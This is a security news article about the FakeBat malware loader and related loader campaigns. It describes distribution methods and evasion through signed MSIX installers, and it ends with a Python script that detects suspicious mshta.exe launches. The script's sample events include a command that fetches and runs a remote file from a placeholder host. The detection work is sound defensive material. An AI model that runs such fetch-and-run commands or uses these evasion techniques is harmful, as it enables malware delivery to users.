The loader-as-a-service (LaaS) known as FakeBat has emerged as one of the most prevalent families of loader malware distributed via drive-by download methods this year, according to findings by Sekoia.
Sekoia’s analysis, released on Tuesday, highlights that FakeBat primarily functions to download and execute subsequent-stage payloads like IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif.
Drive-by attacks utilize techniques such as search engine optimization (SEO) poisoning, malvertising, and the injection of malicious code into compromised websites. These methods aim to lure users into downloading counterfeit software installers or fake browser updates.
The rise of malware loaders in recent years corresponds with the increasing use of landing pages that mimic legitimate software sites and serve what appear to be authentic installers. This trend underscores the continued effectiveness of phishing and social engineering as primary methods of initial access for threat actors.
Known also as EugenLoader and PaykLoader, FakeBat has been marketed to other cybercriminals under a subscription model within underground forums by a Russian-speaking threat actor known as Eugenfest (also referred to as Payk_34) since at least December 2022.
The loader is engineered to evade security measures and offers clients the ability to customize builds using templates that impersonate legitimate software, as well as to monitor installations over time through an administrative interface.
While earlier versions employed the MSI format for malware builds, recent iterations from September 2023 onwards have transitioned to the MSIX format and sign the installer with a valid certificate to evade Microsoft SmartScreen protections.
Pricing for FakeBat is structured at $1,000 weekly and $2,500 monthly for MSI format, $1,500 weekly and $4,000 monthly for MSIX format, and $1,800 weekly and $5,000 monthly for the combined MSI and signature package.
Sekoia identified various activity clusters involved in spreading FakeBat through three main avenues: impersonating popular software via malicious Google advertisements, distributing fake web browser updates through compromised sites, and employing social engineering tactics on social networks. These activities are linked to campaigns likely orchestrated by groups such as FIN7, Nitrogen, and BATLOADER.
Sekoia’s statement reveals that FakeBat command-and-control servers are likely configured to filter traffic based on characteristics such as User-Agent values, IP addresses, and geographic locations, enabling targeted distribution of the malware.
In related developments, AhnLab Security Intelligence Center (ASEC) reported on a malware campaign propagating another loader named DBatLoader (also known as ModiLoader and NatsoLoader) through phishing emails themed around invoices.
The discovery follows findings of infection chains that deliver Hijack Loader (aka DOILoader and IDAT Loader) via websites offering pirated movie downloads, ultimately deploying the Lumma information stealer.
Researcher Dave Truman from Kroll detailed the complexity of the IDATLOADER campaign, which employs multiple layers of code-based obfuscation and innovative methods to conceal malicious code, including the use of Microsoft’s mshta.exe to execute code hidden within a file masquerading as a PGP Secret Key.
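The mshta.exe technique above suggests a straightforward detection: the legitimate use of mshta.exe is to run .hta files, so an invocation whose target has some other extension (such as a file dressed up as a PGP key) or a remote URL is worth alerting on. The following is an added example written for this article, not code from Kroll or Sekoia; the event format and the sample process-creation records are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\private.asc"'},
    {"image": r"C:\Windows\SysWOW64\mshta.exe",
     "command_line": r"mshta.exe https://example.invalid/update.hta"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c type "C:\Users\alice\private.asc"'},
]


def split_cmdline(cmd):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [q or s for q, s in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def classify(event):
    """Return a detection reason for an mshta.exe event, or None if benign."""
    if PureWindowsPath(event["image"]).name.lower() != "mshta.exe":
        return None
    args = split_cmdline(event["command_line"])[1:]
    if not args:
        return None
    target = args[0]
    if target.lower().startswith(("http://", "https://")):
        return "mshta_remote_url"
    ext = PureWindowsPath(target).suffix.lower()
    if ext != ".hta":
        # e.g. a script hidden in a file masquerading as a PGP key
        return "mshta_non_hta_target:" + (ext or "none")
    return None


def scan(events):
    """Return (command_line, reason) pairs for every event that triggers."""
    return [(e["command_line"], r) for e in events if (r := classify(e))]


if __name__ == "__main__":
    for cmd, reason in scan(SAMPLE_EVENTS):
        print(reason, "<-", cmd)
```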
Further phishing campaigns have been observed distributing Remcos RAT, with a new Eastern European threat actor identified as Unfurling Hemlock leveraging loaders and emails to disseminate binary files that act as a “cluster bomb,” spreading various malware strains simultaneously.
Outpost24 researcher Hector Garcia noted that these campaigns predominantly distribute stealers such as RedLine, RisePro, and Mystic Stealer, alongside loaders like Amadey and SmokeLoader. The initial stage typically consists of emails sent to various organizations or of downloads from external sites associated with other loaders.